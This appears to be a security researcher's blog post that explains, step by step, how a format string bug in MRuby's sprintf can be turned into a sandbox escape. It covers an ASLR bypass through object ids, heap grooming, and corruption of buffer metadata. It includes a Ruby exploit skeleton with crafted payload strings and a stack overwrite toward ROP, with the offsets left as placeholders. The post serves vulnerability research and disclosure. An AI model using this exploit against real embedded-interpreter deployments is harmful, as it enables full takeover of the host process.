MRuby VM Escape – step by step

In the last post we discussed format string implementation vulnerabilities, focusing on the vulnerabilities in the (C/M)Ruby implementation. Since Shopify integrated MRuby in a VM-like scenario, this post presents a step-by-step exploitation of the main vulnerability shown there, achieving a VM escape.

Attack Scenario – MRuby VM

Shopify, and more specifically shopify-scripts, enables clients to embed Ruby scripts, using a thin (M)Ruby implementation called mruby-engine. MRuby-engine is executed in a separate process, and the engine also creates a thread that limits the memory resources and the execution time of the interpreter thread.

This thin version uses only a limited subset of mruby-gems, and unfortunately sprintf is not one of them. However, since the format string feature is widely used, this post will simulate the potential risk in a scenario that does integrate the sprintf gem. And so, from now on we will assume that the format string module is used in the engine, practically assuming that this is an MRuby VM, instead of an MRuby-engine VM.

Attack Scenario – Main Vulnerability

The vulnerability presented in the previous post is a format string implementation vulnerability, triggered through the “%G” case:

...
// EI: fractions (%f, %G, ...)
if ((flags&FWIDTH) && need < width)
  need = width;
need += 20;
CHECK(need);
// EI: And this is a double vulnerability
n = snprintf(&buf[blen], need, fbuf, fval);
blen += n;

A large width specifier causes an integer overflow, thus bypassing the limit checks
The invalid format causes the snprintf() call to fail, returning -1
“blen += n” then decreases the blen variable, which holds the write offset in the allocated buffer

In short, we can move the write offset in the response buffer backwards in a controlled fashion, causing a fully-controlled heap buffer underflow.
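The arithmetic behind these three steps can be sketched in plain Ruby. This is only a model of the C behaviour described above, not mruby code: the helper names (wrap_int32, blen_after) are hypothetical, and the sketch assumes that "need" is a 32-bit signed int that wraps on overflow and that every repeated specifier makes snprintf() return -1.

```ruby
# Hypothetical model of the C arithmetic, not part of mruby.
INT32_MIN  = -(2**31)
INT32_SPAN = 2**32

# Wrap an arbitrary Integer into the range of a signed 32-bit int.
def wrap_int32(value)
  ((value - INT32_MIN) % INT32_SPAN) + INT32_MIN
end

# Each failing snprintf() returns -1, and "blen += n" adds it to the offset.
def blen_after(start_blen, failed_specifiers)
  start_blen + failed_specifiers * -1
end

width = 2_147_483_628            # the width used in the format string
need  = wrap_int32(width + 20)   # "need += 20" overflows the signed int

puts need            # -2147483648
puts need.negative?  # true: a negative size slips past a "does it fit" check
puts blen_after(0, 16)  # -16: sixteen specifiers move the offset 16 bytes back
```

The width 2147483628 is exactly INT_MAX - 19, so adding 20 is the smallest step that pushes the value past INT_MAX.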

Write Primitive – detailed analysis

Since we may want to overwrite data that is positioned far before our buffer, we need to check a few conditions regarding the mrb_str_format function:

Can we position our response buffer ahead of the desired target?
Can the format string operation end before the start of the response buffer?

The answer to the 1st question will be explained in the next chapter, which covers several key points about memory allocation.

The 2nd question is especially important: it tells us whether we can achieve a write-what-where-like primitive, or only a contiguous write that may collide with other sensitive data structures near the wanted target. Unfortunately, snprintf() terminates the buffer with ‘\0’ in error cases. This means that it will leave a trail of 0s along our underflow path, which is not exactly a minor side effect. We will have to minimize the length of our underflow, and manually rewrite several values along the path to keep the heap consistent.
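To make the side effect concrete, here is a toy simulation of the underflow on an array of bytes. It is a sketch under the assumptions stated in the text (each failing snprintf() writes a single ‘\0’ at the current offset and then moves the offset one byte back); the function name and the 0xAA marker for untouched memory are made up for the illustration.

```ruby
# Toy model: memory is an Array of byte values, buffer_start is the index
# where the response buffer begins. All names here are hypothetical.
def simulate_underflow(memory, buffer_start, failed_specifiers, payload)
  offset = buffer_start
  failed_specifiers.times do
    memory[offset] = 0   # NUL terminator left behind by the failing snprintf()
    offset -= 1          # blen += -1
  end
  # The literal bytes that follow in the format string are copied forward.
  payload.each_byte do |byte|
    memory[offset] = byte
    offset += 1
  end
  memory
end

memory = Array.new(16, 0xAA)   # 0xAA marks bytes we never touched
simulate_underflow(memory, 12, 8, "ABCD")

puts memory.map { |byte| format("%02X", byte) }.join(" ")
# AA AA AA AA 41 42 43 44 00 00 00 00 00 AA AA AA
```

The four payload bytes land 8 bytes before the buffer, and every byte between them and the buffer start is zeroed unless the payload is long enough to rewrite it with the correct values.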

MRuby Memory layout

Important note: the exploitation setup is my 32-bit Linux VM, with ASLR enabled.

Key points from a recon of the memory layout of the target process:


Bitness – 32 bits in our case
OS – Ubuntu 16.04
ASLR – fixed position elf, randomly mapped libraries
Memory pool implementation – interpreter wrapper over standard malloc()
W^E – enabled

The 4th point is sometimes very important, as PHP for example implements a tailor-made memory pool. Since their memory pool is very naive, heap buffer overflows are much simpler to exploit there, as opposed to the standard malloc() that now has quite a few sanity checks.

The 3rd point offers a great starting point, and it is somewhat typical for targets that were compiled for Linux machines:

We can build a ROP from gadgets in the main elf, without an information disclosure
We can use the elf’s globals without an information disclosure

This means that we only need to pivot the stack to a controlled buffer, and the rest will be relatively easy.

Locating our response buffer

MRuby buffer objects, strings (RO) and arrays (RW) for example, consist of two memory data structures:

Metadata structure – relatively small allocation
Data buffer – allocation according to “size + 1” for strings

The basic allocation of the response buffer in the vulnerable function is:

bsiz = 120
MRB_STR_BUF_MIN_SIZE = 128
Basic allocation = MRB_STR_BUF_MIN_SIZE + 1 = malloc(129)

Garbage Collection

MRuby’s garbage collector (GC) can be tuned, allowing us to completely stop it for the entire exploit. This is necessary as we want to operate in a stable, and hopefully static, memory heap.

ASLR Bypass

ASLR is a great defense concept, however its common implementations have some major drawbacks. In our case, we can roughly say that the ASLR randomizes the second MSB in the address:

Addresses can still be categorized (heap, stack, code) using the MSB
Offsets in each section (stack/heap) are fixed, offering a quiet playground for an attacker

We still need to find this randomized address byte for the heap and for the stack. Here the interpreter nature of the VM comes to our rescue. While we could search for an information disclosure vulnerability in MRuby, like this vulnerability I found several weeks prior to the format string vulnerability, there is an easier way. Interpreted languages need to generate a unique id for each object, and most of the time this id is simply the memory address of the object.

In addition, when building the string representation of a class instance, the default representation will be its name + id. This exposes the id without even needing to look up the id syntax of each targeted interpreter language.

Interpreter VM – Conclusion #1:

The unique id for an object is commonly its address in memory. This gives an attacker an easy ASLR bypass for a specific (often heap) object. Combined with a read-where primitive, this often enables an easy construction of the entire memory map of the VM.
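As a minimal sketch of this leak, the helper below pulls the hexadecimal id out of an object's default string representation. The helper name leaked_id is hypothetical, and the regular expression simply assumes the representation contains a "0x..." value, as in "#<A:0x...>". Whether that value really is a usable memory address depends on the interpreter and its version, so treat the result as a candidate address only.

```ruby
# Dummy class whose instances use the default string representation.
class A
end

# Hypothetical helper: extract the hex id from "#<A:0x...>".
# Returns nil when the representation carries no hex id.
def leaked_id(object)
  match = object.to_s.match(/0x([0-9a-f]+)/i)
  match && match[1].to_i(16)
end

puts A.new.to_s                  # the default representation, name + id
puts leaked_id(A.new).to_s(16)   # the id as a hex number
```

The exploit skeleton later in the post does the same thing with a fixed substring slice instead of a regular expression, which is enough once the length of the representation is known.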

Memory Layout Tips

The memory layout is extremely fragile! Almost every change of a string, function call, or code snippet will mix up the layout. Here are several tips to avoid such changes:

Allocate fixed global variables and strings in advance
Fine tune the values of the globals on the way, and maintain their original sizes
“1” * 10 != “1111111111” – use “ugly” long strings for placeholders
Allocate several format string options, and pick the one that best suits the layout

In order to minimize the length of our underflow, we will allocate a large number of strings and arrays, thus closing the gap between the small allocations and the large allocations. We will then pick the closest allocated objects as our targets.

Exploit – putting it all together

Now we only need to combine the primitives we collected so far, so our exploit’s skeleton will look like this:

# Position the ROP code for later use (filled later)
rop_code = '' # assume a const string of size 0x2000 (see previous tips)
# Create a dummy class that will be used for the information disclosure (INF)
class A
end
# Disable the GC so it won't interfere
GC.disable()

# prepare the address offsets in advance
heap_MSB  = 0x00000000
stack_MSB = 0xB0000000
# Leak the heap's address using the leaked id
# The actual offset depends on the final memory layout
heap_base = A.new.to_s()[6, 7].to_i(16) - OBJ_HEAP_OFFSET
# Prepare the format options, the best option will be picked for use
# Using an option changes the layout much less than building an option
length1 = SMALL_LENGTH # small option
#                                       huge (signed) length      stack buffer                              malloc metadata
format1 = "% 2147483628G" * length1 + "\x00\x00\x00\x40" * 2 + "\x08\x00\x00\xB0" + "8" * (length1 - 16) + "\x81\x00\x00\x00"
args1   = [1.2] * length1

length2 = BIG_LENGTH # huge option (wasn't needed after all)
format2 = "% 2147483628G" * length2 + "\x11\x22\x33\x44" * 2 + "\x22\x33\x44\x55" + "7" * (length2 - 16) + "\x81\x00\x00\x00"
args2   = [1.2] * length2

length3 = MED_LENGTH # medium option
#                                      huge (signed) length        heap buffer
format3 = "% 2147483628G" * length3 + "\x00\x00\x00\x40" * 2 + "\x00\x00\x00\x00" + "6" * (length3 - 16) + "\x81\x00\x00\x00"
args3   = [1.2] * length3

# prepare a product of all options
args11 = [format1] + args1
args12 = [format1] + args2
args13 = [format1] + args3

args21 = [format2] + args1
args22 = [format2] + args2
args23 = [format2] + args3

args31 = [format3] + args1
args32 = [format3] + args2
args33 = [format3] + args3
# declare the pool of target strings
index = 0
string_pool = []
while index < 2000 do
  string_pool.append("1" * 20) # size of a metadata chunk
  index += 1
end
# Exploit vulnerability to change the string - gaining a Read-Where primitive:
# pointer = 0 (heap MSB is 0)
# length, capacity = huge (positive) constant
sprintf(*args32)

# Search for a stack address somewhere in the heap
stack_address = 0
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 3 - heap_MSB].ord()
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 2 - heap_MSB].ord()
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 1 - heap_MSB].ord()
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 0 - heap_MSB].ord()
stack_base = stack_address - STACK_INF_OFFSET

# declare the pool of target arrays
index = 0
array_pool = []
while index < 400 do
  array_pool.append([1])
  index += 1
end

# Exploit vulnerability to change the array - gaining a Write-What-Where primitive:
# pointer = stack MSB + possible alignment (8)
# length, capacity = some (positive) huge constant
sprintf(*args12)
target_array = array_pool[ARRAY_TARGET_OFFSET]

# Overwrite the desired stack target with our ROP code
target_array[(stack_base - stack_MSB + STACK_WRITE_OFFSET) / 0xC] = heap_base + ROP_HEAP_OFFSET

Technical note

Each array element is 12 (0xC) bytes, which is why I added the division in the last line. If the desired address is not aligned, we can simply change the LSB in the format_args so that it matches the desired remainder (8 in our case), effectively aligning the address.
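The alignment trick can be written out as a small calculation. In this sketch the function name array_write_slot is hypothetical; it assumes a 12-byte element, as stated above, and ignores where inside the element the written value actually lands.

```ruby
ELEMENT_SIZE = 0xC  # bytes per array element, as stated in the note above

# Given the address we want to hit and the base of its memory region,
# return the fake data pointer to plant and the array index to write to.
def array_write_slot(target_address, region_base)
  remainder    = (target_address - region_base) % ELEMENT_SIZE
  data_pointer = region_base + remainder   # base with adjusted low bits
  index        = (target_address - data_pointer) / ELEMENT_SIZE
  [data_pointer, index]
end

pointer, index = array_write_slot(0xB0000020, 0xB0000000)
puts format("pointer=0x%08X index=%d", pointer, index)
# pointer=0xB0000008 index=2
```

Here the target is 0x20 bytes past the base, the remainder modulo 12 is 8, so the planted pointer ends in 0x08 and element 2 of the array covers the target.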

Flash-like exploit

During the exploit we use a popular technique that is more common in flash exploits: modifying a buffer object’s metadata (Vector in flash) to allow read-where and write-what-where primitives. This works well in interpreter VM scenarios, enabling us to leverage our write primitive into much simpler read/write primitives.
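The bytes that replace the metadata can be built with Array#pack instead of hand-written escape sequences. The sketch below is an illustration only: the helper names are hypothetical, the field order (length, capacity, data pointer) is taken from the comments in the exploit skeleton, and the 4-byte trailing value stands for the allocator size field that the skeleton restores at the end of the format string.

```ruby
# Pack three 32-bit little-endian fields: length, capacity, data pointer.
def fake_metadata(length, capacity, pointer)
  [length, capacity, pointer].pack("V3")
end

# Bytes written after an underflow of underflow_length bytes: the fake
# metadata, filler covering the trail of zeros, and the size field.
def overwrite_payload(underflow_length, metadata, chunk_size_field, filler = "8")
  filler_count = underflow_length - metadata.bytesize - 4
  raise ArgumentError, "underflow too short" if filler_count < 0
  metadata + (filler * filler_count).b + [chunk_size_field].pack("V")
end

metadata = fake_metadata(0x40000000, 0x40000000, 0xB0000008)
payload  = overwrite_payload(64, metadata, 0x81)

puts metadata.unpack("C*").map { |b| format("%02X", b) }.join(" ")
# 00 00 00 40 00 00 00 40 08 00 00 B0
puts payload.bytesize  # 64
```

Because the payload is exactly as long as the underflow, the write ends where the response buffer begins, which is why the skeleton uses a filler of length - 16 around its 12 metadata bytes and 4 size bytes.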

Cartography

Using the read-where primitive we can scan the heap for a stack address. Since the ASLR is weak we can do this in a pre-processing step. I usually call this recon phase “cartography”, as we travel the memory layout, collect interesting addresses, and build a detailed map of the process. Once we have a read-where primitive in a VM-like scenario, the cartography phase becomes a technical, but easy, phase.

Since we already gathered a heap address, we located the heap’s base. Surprisingly, it is often very easy to locate stack addresses on the heap; this time I found an address on the 3rd attempt: HEAP_OFFSET = 8. We can locate the libraries using the PLT, and the fact that it has a fixed address.
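The scanning step can be sketched offline on a captured block of bytes. Everything in this example is hypothetical: the helper names, the sample values, and the choice to classify an address as "stack" by comparing its top nibble with 0xB, which mirrors the stack_MSB constant of the skeleton rather than any general rule.

```ruby
# Read a 32-bit little-endian value at a byte offset.
def read_u32(memory, offset)
  memory.byteslice(offset, 4).unpack("V").first
end

# Return [offset, value] for the first aligned word that looks like a
# stack address, or nil when none is found.
def find_stack_pointer(memory, stack_msb, mask = 0xF0000000)
  (0..memory.bytesize - 4).step(4) do |offset|
    value = read_u32(memory, offset)
    return [offset, value] if (value & mask) == stack_msb
  end
  nil
end

# Made-up snapshot of four heap words; only the last one is stack-like.
heap_snapshot = [0x0804A010, 0x09D3C008, 0x00000081, 0xBF9A1C40].pack("V*")
offset, value = find_stack_pointer(heap_snapshot, 0xB0000000)
puts format("offset=%d value=0x%08X", offset, value)
# offset=12 value=0xBF9A1C40
```

In the live exploit the same four-byte reads go through the corrupted string, one character at a time, as the skeleton does when it assembles stack_address.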

Note #1: Taking control over the program’s flow can be done using the GOT, since we have a write-what-where primitive. I used the stack instead in order to demonstrate that even when modern defense mechanisms are deployed, cartography is still a walk in the park from an attacker’s point of view.

Note #2: If the elf’s code was also randomized, one could locate it simply by scanning the stack’s return addresses.

Interpreter VM – Conclusion #2:

VM-like environments enable an attacker with a read-where primitive and a single memory “clue” to easily build a detailed memory map. The cartography phase isn’t noticeable by the VM, and it allows an attacker a complete ASLR bypass using a single memory “clue”: heap address, stack address, etc.

Filling up the figures

From here on it only takes some careful debugging for filling up the needed constant offsets, to finalize the exploit. Since all of the needed technical details were already explained in the post, I leave it as an exercise for the eager readers.

Conclusion

Using a format string implementation vulnerability in the MRuby library, I demonstrated the design flaws in an Interpreter-VM scenario. Combining it all together, we achieved the desired goal of a “VM Escape”, giving the attacker full control over the targeted process. I believe that several of the techniques used during the exploit can be migrated to other cases, much like the flash Vector technique was migrated to this interpreter scenario. It seems like the cartography phase will continue to be an important phase in VM-like exploits, and hopefully it will be addressed by more defense mechanisms in the future.

White hat security researcher. Recently finished my M.Sc. at TAU, and now focus on security research, mainly in open source projects. View all posts by eyalitkin